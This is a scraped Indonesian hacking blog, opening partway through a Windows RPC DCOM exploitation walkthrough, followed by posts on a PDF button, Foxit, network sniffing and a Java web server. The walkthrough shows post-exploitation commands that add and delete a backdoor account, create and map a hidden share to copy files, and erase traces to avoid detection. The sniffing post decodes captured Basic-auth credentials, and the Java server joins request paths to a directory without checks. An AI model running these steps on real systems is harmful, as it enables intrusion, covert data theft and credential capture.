Account active Yes <---- acount nya aktif ;p 
Account expires Never 
Password last set 1/1/2003 8:51 AM 
Password expires Never 
Password changeable 1/1/2003 8:51 AM 
Password required Yes 
User may change password Yes 

Workstations allowed All 
Logon script 
User profile 
Home directory 
Last logon 9/20/2007 5:48 PM 

Logon hours allowed All 

Local Group Memberships *Administrators <- group Administrators 
Global Group memberships *None 
The command completed successfully.- 



Gimana kalo kita add user?? bisa ga ya??coba yuu ;p 


D:\>net user tamu 12345 /add 
net user tamu tamu /add 
The command completed successfully. 



artinya kita menambahkan user tamu dengan password 12345 



D:\>net user 
net user 

User accounts for \\ 

---------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
kidz SUPPORT_388945a0 tamu 
The command completed with one or more errors. 



Sipp dah berhasil di create tuh user tamu ;p 

Nah berikutnya terserah mau jadikan user tamu itu masuk ke group 
administrators, terus kita pake acount tersebut buat connect back 
dan seterusnya..Silahkan saaja dan kembangin sendiri ya ;p 
Ok, kalo dah ga kepake kita hapus yuu user tamu itu biar ga ketahuan 
kalo kita nyusup ;p 



D:\>net user tamu /delete 
net user tamu /delete 
The command completed successfully. 

D:\>net user 
net user 

User accounts for \\ 

---------------------------------------------------------------------- 
Administrator Guest HelpAssistant 
kidz SUPPORT_388945a0 
The command completed with one or more errors. 



Sip dah kehapus user tamu tsb ;p 

Kita explore Drive lain yuuu..masih lom cape khan ;-P hehehe 



D:\>f: 

F:\>dir /a 
dir /a 
Volume in drive F is high-Q 
Volume Serial Number is 190T-1958 

Directory of F:\ 

19/09/2007 06:39 sore <dir> FOUND.000 
09/09/2007 01:38 pagi <dir> System Volume Information 
07/09/2007 12:31 sore <dir> Recycled 
14/09/2007 07:50 sore <dir> film 
08/09/2007 07:50 sore <dir> SongZ 
0 File(s) 0 bytes 
5 Dir(s) 5.067.175.298 bytes free 





F:\>cd SongZ 
cd SongZ 

F:\>SongZ>dir /a 
dir /a 
Volume in drive F is high-Q 
Volume Serial Number is 190T-1958 

Directory of F:\SongZ 

16/03/2007 07:50 sore <dir> . 
11/07/2007 07:50 sore <dir> .. 
05/02/2003 06:16 pagi <dir> Indonesia 
07/09/2003 06:18 pagi <dir> Barat 
19/02/2007 07:51 sore <dir> Lirik Lagu 
0 File(s) 0 bytes 
5 Dir(s) 5.030.287.287 bytes free 



Coba kita share yuuk Folder SongZ yang ada di f:\, abis itu kita 
mapping di PC kita ;p asyi bukan  



F:\SongZ>net share b$=f:\SongZ 
net share b$=f:\SongZ 
b$ was shared successfully 

F:\SongZ>net share 
net share 

Share name Resource Remark 

----------------------------------------------------------------------- 
IPC$ Remote IPC 
D$ D:\ Default share 
b$ f:\SongZ 
F$ F:\ Default share 
ADMIN$ C:\WINDOWS Remote Admin 
C$ C:\ Default share 
E$ E:\ Default share 
The command completed successfully. 



yup dah si share tuh f:\SongZ dgn nama share nya b$. 
OK berarti kita tinggal mapping aja ke PC kita, seolah olah kita 
punya partisi hardisk baru. misal kita punya partisi c,d,e,f,g maka 
biasa nya kalo kita telah berhasil mapping maka akan tampak partisi 
Z di PC kita. untuk mapping ke dua maka akan tampak mapping point 
berikutnya yaitu Y. maaping point tersebut sama seperti saat kita 
melakukan "map network drive" suatu folder yang di share PC lain. 
yukk langsung kita coba aja ;p 
kita buka PC kita : 



G:\Documents and Settings\fl3xu5>net use Z: \\172.16.0.5\b$ 
The command completed successfully. 

G:\Documents and Settings\fl3xu5>net use 
New connections will not be remembered. 

Status Local Remote Network 

----------------------------------------------------------------- 
OK Z: \\172.16.0.5\b$ Microsoft Windows Network 

The command completed successfully. 



Sip.. dah berhasil di mapping ke Z: 
Silahkan cek di MY komputer kita maka akan nampak drive Z tersebut 
yang berisi file sharing \\172.16.0.5\b$ 
jika sudah berhasil maka bisa kita copy file share dari PC target ;p 
teknik ini digunakan untuk memudahkan kita dalam mengakses karena 
kita tidak perlu mem browse PC target, melainkan kita tinggal klik 
drive Z yang telah menjadi mapping point tersebut.;p 
*laykanya kita mengakses drive PC kita ;p 
Nah kalo dah tidak diperlukan segera "disconnect map drive" tadi, 
tujuanya agar tidak di ketahui kalo kita dah nge share dan nge map 
file dari PC target tersebut. (Ingat, kita maen bersih yak ;p) 
caranya : 



G:\Documents and Settings\fl3xu5>net use Z: /delete 
Z: was deleted successfully. 

G:\Documents and Settings\fl3xu5>net use 
New connections will not be remembered 

There are no entries in the list. 



Nampak kalo Z: sudah tidak ada, artinya sudah tidak ada mapping 
point di PC kita.. 
Supaya aman jangan lupa kita unshare b$ dari PC target tadi, caranya : 


F:\SongZ>net share b$ /delete 
net share b$ /delete 
b$ was deleted successfully 



Cek yuu dah ter unshare blom b$ tadi : 


F:\SongZ>net share 
net share 

Share name Resource Remark 

----------------------------------------------------------- 
IPC$ Remote IPC 
D$ D:\ Default share 
F$ F:\ Default share 
ADMIN$ C:\WINDOWS Remote Admin 
C$ C:\ Default share 
E$ E:\ Default share 
The command completed successfully. 




----===== Analisa =====--- 
-Dalam kasus ini PC target merupakan PC dengan OS windows dengan default 
installation artinya smuwa konfigurasi masih default, belum dilakukan 
patching terhadap OS windows tersebut. Dan juga tidak dilakukan installasi 
terhadapa Antivirus or firewall. Meskipun antiviurs dan firewall bukan 
satu cara yang bagus untuk men secure tapi paling tidak ada beberapa 
yang cocok untuk melakukan pencegahan terhadap exploit msrpcdcom ini. 

----===== Pencegahan =====--- 
-Salah satu pencegahan yang bisa dilakukan adalah dengan menginstall 
AV dan firewall serta lakukan lah patching, sehingga mencegah 
adanya intruder/attacker via port 135 tersebut dengan memanfaatkan 
rpcdcom tadi. 

Nah penulis coba lakukan filtering packet yang ada di TCP/IP properties 
yaitu dengan 
Pilih network connection --> klik kanan pada LAN --> properties--> 
TCP/IP --> properties --> advanced --> options --> TCP/IP Filtering 
--> properties --> Enable TCP/IP filtering --> klik permit only --> 
add --> masukkan port 80 --> ok --ok -->ok --> ok. 
Setelah melakukan filtering tadi, penulis coba exploitasi dengan cara 
yang sama via port 135 tadi, dan hasilnya tidak berhasil terexploitasi. 
padahal tanpa install AV dan firewall sebelumnya. 
Akan tetapi, banyak efect yang terjadi setelah melakukan filtering tadi. 
seperti tidak bisa sharing file. 
berdasarkan analisa penulis, tidak berhasilnya exploitasi tadi 
dikarenakan port 135 tertutup, dimana port 135 digunakan sebagai 
servis yang berhubungan dengan file sharing tadi. 




--===== Penutup =====--- 

--->> Info tambahan 
-- untuk informasi lebih tentang metasploit silahkan ke 
http://metasploit.com, dan gunakan ? pada msf console. 
- info DOS command, ketik help pada command prompt untuk mengetahui 
lebih dalam command2 apa saja yang digunaakn dalam windows (DOS) 


- Silahkan menganalisa lebih dalam tentang netstat, dengan ketik 
netstat /? pada cmd. 
Coba saya berikan sampel nya : 



G:\Documents and Settings\fl3xu5>net 
The syntax of this command is: 


NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | 
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | 
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ] 


G:\Documents and Settings\fl3xu5>net localgroup /? 
The syntax of this command is: 


NET LOCALGROUP 
[groupname [/COMMENT:"text"]] [/DOMAIN] 
groupname {/ADD [/COMMENT:"text"] | /DELETE} [/DOMAIN] 
groupname name [...] {/ADD | /DELETE} [/DOMAIN] 


G:\Documents and Settings\fl3xu5>net share /? 
The syntax of this command is: 


NET SHARE 
sharename 
sharename=drive:path [/GRANT:user,[READ | CHANGE | FULL]] 
[/USERS:number | /UNLIMITED] 
[/REMARK:"text"] 
[/CACHE:Manual | Documents| Programs | None ] 
sharename [/USERS:number | /UNLIMITED] 
[/REMARK:"text"] 
[/CACHE:Manual | Documents | Programs | None] 
{sharename | devicename | drive:path} /DELETE 


G:\Documents and Settings\fl3xu5>net start /? 
The syntax of this command is: 


NET START 
[service] 


G:\Documents and Settings\fl3xu5>net stop /? 
The syntax of this command is: 


NET STOP 
service 


G:\Documents and Settings\fl3xu5>net use /? 
The syntax of this command is: 


NET USE 
[devicename | *] [\\computername\sharename[\volume] [password | *]] 
[/USER:[domainname\]username] 
[/USER:[dotted domain name\]username] 
[/USER:[username@dotted domain name] 
[/SMARTCARD] 
[/SAVECRED] 
[[/DELETE] | [/PERSISTENT:{YES | NO}]] 

NET USE {devicename | *} [password | *] /HOME 

NET USE [/PERSISTENT:{YES | NO}] 



G:\Documents and Settings\fl3xu5>net user /? 
The syntax of this command is: 


NET USER 
[username [password | *] [options]] [/DOMAIN] 
username {password | *} /ADD [options] [/DOMAIN] 
username [/DELETE] [/DOMAIN] 


G:\Documents and Settings\fl3xu5>net view /? 
The syntax of this command is: 


NET VIEW 
[\\computername [/CACHE] | /DOMAIN[:domainname]] 
NET VIEW /NETWORK:NW [\\computername] 




--->> Aware !!- 
-To All, mohon diperhatikan sisi security dari windows, salah satunya 
bug rpcdcom tersebut. dan bug bug lain seperti port 139 yang bisa 
di exploitasi dengan lsass.. dsb 
Update lah info security anda, termasuk info bug dan advisory dari 
aplikasi2 yang anda pakai,lakukan patching jgn lupa ya.dsb.- 
---->> Thanks Shout and Greetz To : 
- ALLAH SWT dan Nabi Muhammad SAW 
- My parents and my Family (thx u very much for your love..) 
- My h0n3y  
- all of te-28-01 erz  
- My 4G'erz at mobilecommlab[dot]or[dot]id (ayuu smangat!!;p) 
- newhack|staff , newhack[dotorg 
- all member CnC labz : arz, freak,Cyb3rh3b dkk (missed u guys ;p) 
- Student's erZ #students..oii jgn chat muluw  
- all of Indonesian Undergorundz Community | staff and memberz 
- all of my friends 
- at #newhack[dot]org #e-c-h-o, #1stlink, #antihackerlink, 
#k-elektronik, #yogyafree, #xcode, #sekuritionline, 
#jasakom, #unsecured and all of underground channel @DALnet 
#nyubicrew @irc.mildnet.org 
- k1tk4t, mR.opt1lc, Pushm0v, gh0z ,sakitjiwa, cybertank, m_beben, 
matdhule, shideX, t0ngkring, th3sn0wbr4in, y3d1ps, the_day, 
lirva32, ayulina, dark|ipl, digital-levi, bledhek, hzent, 
tw, kopral;p, natztel, alkahfi;p, si Om, PakRT, timin, 
kopasus, scriptdana, why, vindie, raiden, irving_nazmi, 
Ph03n1X, primadonal, cR45H3R, aulia, sat-anichell, thesims, 
adhietslank, cyberlog, letjen,dkk, boerz, bigie, camgenta, 
the_rumput_kering, lppsmes, sendenk, bigmaster, kendi,dkk, 
mbah scut;), the_peng and Others yang ga bisa disebut satu2.. 
- and all of my friends yang ga bisa di sebutin satu2 baik dalam 
negeri maupun luar negeri - 

Reference : google.com, experiment PC peer to peer with laptop.. 
http://metasploit.com, ezine[at]echo.or.id. 


-----===== Alhamdulillahirabbil'alamiin=====-----

Button Save to PDF in Blogspot

Posted by Bl4ckB0y On 16.27 0 comments

ingin menambahkan tombol save to pdf ke dalam blogspot...wuih ribet banget, untungnya setelah nyari-nyari ketemu caranya... ternya gak sesulit yang dirikira. tinggal copy aja script berikut.



copy...script tersebut pindah ke file text atau apa...masuk ke Customize Blog, masuk ke setting dan pilih edit html...untuk melakukan setting kedalam HTML, trus masukan saja kode itu dimana saja....dan hasilnya seperti miliku di bawah ini...

nah dengan cara ini pengunjung bisa langsung menyimpan blog kita dalam bentuk PDF

selamat mencoba....

Foxit PDF Reader

Posted by Bl4ckB0y On 10.56 0 comments

Foxit adalah sebuah PDF reader yang sangat umum digunakan. banyak sekali kelebihan dari foxit dibanding dengan program PDF reader lain seperti Adobe Reader.  kelebihan foxit dibandingkan dengan PDF Reader yang lain adalah sifatnya yang sangat protable. selain itu ukuran file .exe foxit yang terbilang sangat kecil juga menjadikanya PDF reader yang handal. selain hal diatas satu lagi kelebihan Foxit yang penulis sukai daripada PDF reader yang lain. ia mampu dijalankan di linux via Wine tanpa ada masalah yang berarti dan hebatnya lagi Foxit mampu membuka file PDF lebih cepat dibandingkan dengan program Sejenis. dibawah ini salah satu snapshot yang penulis ambil dengan menjalankan Foxit di Linux via wine tanpa ada masalah berarti dan sangat cepat.


Sniffing Hub

Posted by Bl4ckB0y On 18.50 0 comments

Sniffing merupakan sebuah teknik yang sering digunakan oleh para hacker untuk melakukan pencarian password baik melalui jaringan wireless maupun jaringan LAN. serangann semacam ini tidak dapat dihindari, kenapa ? bukankah sudah pakai antivirus, antitrojan, firewall, dan anti-anti lain..?. tetap tidak bisa dihindari karena ini merupakan kelemahan sejak awal jaringan TCP/IP.

kenapa, memang kelemahan seperti apa..? baik akan diperjelas..sebagai permulaan ada baiknya kita juga belajar TCP/IP. sebenarnya apa sih yang terjadi antar satu komputer dengan komputer lain dalam sebuah jaringan TCP/IP itu. anggaplah ada dua komputer, satu di pakai seorang bernama Ahmad...dengan kondisi alamat MAC (11:11:11:11:11:11) dan IP Address (1.1.1.1), kemudian komputer lain, anggaplah dipakai Bukhori..dengan kondisi MAC (22:22:22:22:22:2) dan IP Address (2.2.2.2), selain itu ada juga komputer sang hacker, anggaplah namanya Chabibi, dengan MAC (33:33:33:33:33:33) dan IP Address (3.3.3.3)..ketiga komputer dihubungkan dengan sebuah hub. 

anggaplah Ahmad mengirim kepada Bukhori sebuah data. maka yang terjadi pada komputer adalah, pertama komputer ahmad akan mencari komputer yang namanya bukhori dalam seluruh jaringan dengan melakukan siaran atau broadcast..(hoi gue mau cari komputer yang namanya bukhori, dengan IP Address (2.2.2.2),  seluruh komputer dalam jaringan termasuk komputer Bukhori dan Candra juga mendengarnya). ketika di broadcast seluruh komputer yang ada ikut mendengar. kemudian komputer bukhori menjawab ( ini gue, komputer bukhori dengan MAC (22:22:22:22:22:2) dan IP Address (2.2.2.2) ). karena sudah mengetahui komunikasi antar dua komputer, kemudian komputer Ahmad mulai mengirim data, dan pada saat itu juga jalur yang dipakai oleh ketiga orang dalam kondisi sedang dipakai ahmad. karena melalui kabel sebenarnya selueuh data diterima oleh seluruh komputer, termasuk komputer Candra asang hacker. akan tetapi dalam kondisi default, komputer candra tidak akan menghiraukan paket data yang tidak ditujukan untuknya. sehingga seolah-olah ia tidak menerima paket apapun. semua paket akan lewat melalui jaringan ini. apapaun itu, termasuk password dan username untuk e-mail, account bank dan lain-lain.

sekarang bagaimana kalau seandainya komputer candra yang selaku hacker mengubah sifat komputernya, karena saat pengiriman data dari ahmad dan bukhori komputer candra juga mendengar, maka jika komputer candra di set untuk mendengarkan atau menerima semua paket, baik yang ditujukan atau yang tidak ditujukan untuknya. maka komputer candra juga bisa mencuri paket yang seharusnya bukan untuk, inilah yang disebut dengan sniffing, yaitu membiarkan semua yang lewat dalam jaringan untuk diambil. nah tool yang bisa digunakan adalah wireshark...dulu namanya ethereal. silakan googling untuk download tersedian versi windows, dan linux.

berikut ini cara memakai ethereal....aku memakai linux mint 6 untuk menjalankanya,

jalankan wireshark..

dalam menu bar pilih capture -> interface, karena untuk jaringan LAN, maka pilih interface eth0, eth1 atau apalah pokoknya ethX. lalu dalam windows yang muncul klik start dan biarkan wireshark bekerja..biarkan saja sampai anda merasa cukup, dari menu capture -> stop. lalu apa yang terjadi semua data yang lewat jaringan akan diambil.

hasilnya akan ditampilkan dalam satu tempat dan sangat acak-acakan..karena bersifat untung-untungan coba carilah paket yang berwarna merah..klik kanan dan pilih follow TCP stream..jika beruntung anda akan mendapatkan tampilan seperti ini


yap itu adalah paket yang siap telah diambila...apaan tuh..acak-acakan gitu? memang asal tahu kita pasti bisa mendekripnya...karena. untuk lebih jelas, tulisanya sepertin berikut.

 
401 Authorization Required

`GET /Apache HTTP/1.1
Host: 192.168.0.5
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


Proxy-Authorization : Basic  bWFybGJvcm9AYmFnb25nLmNvbTpwZWN1bmRhbmcgZGlhbmdnYXAgcGFobGF3YW4=  

HTTP/1.1 401 Authorization Required
Date: Tue, 19 Jun 2007 17:21:39 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.1 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7
WWW-Authenticate: Basic realm="Proxy"
Content-Length: 573
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1


lho username dan passwordnya kok mbulet gitu ?..tenang itu diprotek dengan di enkripsi dengan hash...ya..gunakan tool untuk mendekripnya...passwordnya di-enkripsi menggunakan BASIC. dengan menggunakan script yang disimpan menjadi file unencrypt.pl. berikut script-nya :

#!/usr/bin/perl
# unencrypt.pl
# device from base 64
use MIME::Base64;
print decode_base64($ARGV[0]);

selanjutnya, saya simpan password bWFybGJvcm9AYmFnb25nLmNvbTpwZWN1bmRhbmcgZGlhbmdnYXAgcGFobGF3YW4= ke dalam file bernama password.txt Cara deksripsi-nya melalui konsole ( dengan file password.txt dan file uncrypt.pl dalam satu folder ) yaitu : 
huda@huda-laptop:~# chmod +x unencrypt.pl
huda@huda-laptop:~# ./unencrypt.pl  password.txt
huda@huda-laptop:~# bejo@cs.its.ac.id:p3c2nd4ng_d14ngg4p_p4hl4w4n

nah dapat dilihat bahwa usernamernya : bejo@cs.its.ac.id

dan passwordnya : p3c2nd4ng_d14ngg4p_p4hl4w4n

yap sudah selesai. dalam simulasi ini, user ingin memberikan validasi username dan password dari pemakaian proxy-authorization...

sebenarnya, teknik ini bisa diatasi dengan memberikan enkripsi pada setiap paket yang dikirim, tapi dengan adanya tool denskripsi, enkripsi menjadi tidak berguna selain itu enkripsi membuat jaringan lambat, karena paket harus dienkripsi di kirim dan di denskripsi lagi baru dibaca. cara kedua adalah memakai switch...karena switch mampu membuat jaringan virtual sehingga seperti kasus diatas. Ahmad dan bukhori bertukar data. dengan memakai MAC address 11:11:11:11:11:11 punya ahmad dan 22:22:22:22:22 punya bukhori, maka switch membuat jaringan virtual, yaitu menghubungan port 11:11:11:11:11:11 dan 22:22:22:22:22:22 saja sehingga MAC 33:33:33:33:33:33 tidak mendengar.....

hacker tetap bisa menembusnya..lain kali akan aku bahas masalah Sniffing untuk Switch...tunggu saja

yap samapai jumpa..untuk yang sudah tahu dan expert masalah ini, mohon maaf kalu mbosenin. aku juga masih newbie....

Webserver In Java

Posted by Bl4ckB0y On 06.56 1 comments

web server, merupakan sebuah software yang berfungsi untuk melayani request dari client-client sebuah website, selain itu web server juga harus bisa memberikan output request sesuai keinginan user, hal ini tentu akan sangat kompleks dan rumit mengingat fungsi web server sekaligus sebagai database server. tapi, untuk kali ini kita akan membuat sebuah web server sederhana yang hanya bisa memproses sebuah passing satu variabel saja serta mampu melakukan response post and get. dan bahasa yang akan kita pakai adalah java......
yap untuk itu siapkan netBean (bisa juga pakai Jcreator, tapi harus setting sintax import dan paket sendiri), pertama buat sebuah project dari netbean, beri nama terserah (kalo punyaku kuberika nama "paketku"). otomatis netbean akan membuat sebuah file main dalam project tersebut. pindahkan Source code berikut pada file main anda :

package paketku; //sesuaikan dengan nama project  teman-teman
public class Main {

  public static void main(String[] args) {
  Server s = new Server();
  s.start();
  }
}


kemudian buat sebuah file baru berextensi .java beri nama Server.java dan pindahkan source code berikut pada file Server.java : 

package paketku;
//seuaikan dengan nama project  antum...
import java.net.*;
import java.io.*;
import java.util.StringTokenizer;

public class Server extends Thread{
 public static final int port=1200;
//port yang digunakan, defaultnya 8080
  final static String CRLF = "\r\n";
  @Override
 public void run(){
while(true)
  this.terima();
 }
 
  public void terima(){
  try{
   
  System.out.println("Menunggu Request ");
  ServerSocket server = new ServerSocket(port);
  Socket cleantsoket = server.accept();
  BufferedReader inStream = new BufferedReader(new InputStreamReader(cleantsoket.getInputStream()));
  PrintWriter outStream = new PrintWriter(cleantsoket.getOutputStream(),true);
  String data = inStream.readLine();
  System.out.println("Data Dari client : ( "+data+" )");
  System.out.println("Mengirim String Diterima ke client");
    StringTokenizer tokens = new StringTokenizer(data);
  tokens.nextToken();
// membuang tulisan "GET"
  String fileName = tokens.nextToken();
/*ini fungsinya kalau kita memanggil dari browser localhost:1200/ saja maka yang terjadi adalah web server menririmkan default webnya...isinya ada di String baru, itulah yang dikirimkan ke client, 1200 adalah port yang kita gunakan, jika tidak ditulis defult menggunakan 8080*/
  if(fileName.equals("/")){
  String baru="<html>" +
  "<head><title>INDEX</title></head>" +
  "<body>" +
  "<a href='localhost:1200/index.php'
>POST</a></br>'" +
  "<a href='
localhost:1200/index.php?var=aku'>GET</a>" +
  "</body>" +
  "</html>";
  outStream.println(baru);
  return;
  }
/*lalu bagaimana kalau user menginputkan localhost:1200/index.php
maka kita kirimkan isi file index.htmml yang mana file ini disimpan di /home/huda/Documents/index.html, dan seperti halnya php, jika ada sebuah string berformat $... kita ganti sengan proses web server...alias kita ganti dengan isi vaariabel string itu (untuk methode get, sedang post kita tampilkan apa adanya..)*/
  StringTokenizer tokens_post = new StringTokenizer(fileName);
  fileName=tokens_post.nextToken("?");
//dapatkan nama file
  String variabel_nama="";
//dapat varabel
  String variabel_isi="";
//dapat isi variabel
  if(tokens_post.hasMoreElements()){
  StringTokenizer split = new StringTokenizer(tokens_post.nextToken("?"));
  variabel_nama=split.nextToken("=");
  variabel_isi=split.nextToken("=");
  }
  boolean fileExists = true;
  try {
  String hasil="";
  String temp="";

/*ini dia yang paling penting. karena harus ada sebuah file apapun itu..karena aku pakai
linux jadi aku tarus sebuah file di directory /home/huda/Documents kalo
teman-teman pakai windows taruh aja di C:/ ato apa, trus filenya harus berformat .html
pokoknya apa saja deh...*/
  fileName = "/home/huda/Documents" + fileName;
  BufferedReader inputan = new BufferedReader( new FileReader(fileName));
  while(inputan.ready()){
  temp=inputan.readLine();
  if(temp.equals("$"+variabel_nama)){
  temp=variabel_isi;
  }
  hasil=hasil+temp;
  }
  outStream.println(hasil);
  } catch (FileNotFoundException e) {
  fileExists = false;
  }
/*bagaimana kalau user menginput localhost:1200/bejo.html, padahal bejo.html tidak ada
maka kita tampilkan html default dalam hal ini adalah penyataan not found.*/
  if (!fileExists) {
  String entityBody = "<html>" + 
  "<head><title>Not Found</title></head>" +
  "<body>Not Found</body>
</html>";
  outStream.println(entityBody);
  }
   
   
  }catch(Exception p){
  p.printStackTrace();
  }

   
  }

   
  private static void sendBytes(FileInputStream fis, OutputStream os) throws Exception{
   
  byte[] buffer = new byte[1024];
  int bytes = 0;

  while((bytes = fis.read(buffer)) != -1 ) {
  os.write(buffer, 0, bytes);
  }
  }
  private static String contentType(String fileName){
  if(fileName.endsWith(".htm") || fileName.endsWith(".html")) {
  return "text/html";
  }
  return "application/octet-stream";
  }
}
berikut ini adalah file defult bernama index.php inilah file yang dipanggil secara get atau post : 
  <html><head>
  <title>INDEXKU</title>
  </head>
  <body>
<strong>Ini dari Localhost Java....</strong>
isinya var = 
$var
</body>
</html>
disini terdapat variabel $var yang akan berubah menjadi jika dipanggil secara getdan tetap ditampikan apa adanya jika dipanggil secara post...
OK saat percobaan...jalankan dengan klik run...
hasil tampilan :
tampilan ketika di browser ditulis localhost:1200/ akan menghasilkan tampilan pertama
jika "get" di browser dari tampilan diklik atau browser ditulis address localhost:1200/index.php?var=aku mala akan menghasilkan tampilan yang kedua disini $var diganti dengan tulisan "aku"
jika "post" di browser dari tampilan pertama di klik akan menghasilkan tampilan yang ketiga ini juga bisa jika address ditulis localhost:1200/index.php tampak perbedaanya disini $var ditulis apa adanya...
jika kita memasukan file yang tidak ada akan menghasilkan tampilan ke empat..atau bisa juga ditulis di browser localhost:1200/bejo.html atau apalah.html akan menghasilkan yang not found...karena file itu tak pernah ada...
begitulah web server yang kita buat..simple dan mampu menimplementasikan php walaupun masih sangat-sangat sederhana...selamat mencoba...dan kembangkan terus...

your Ads Here

Your Ad Here FellowEquality.com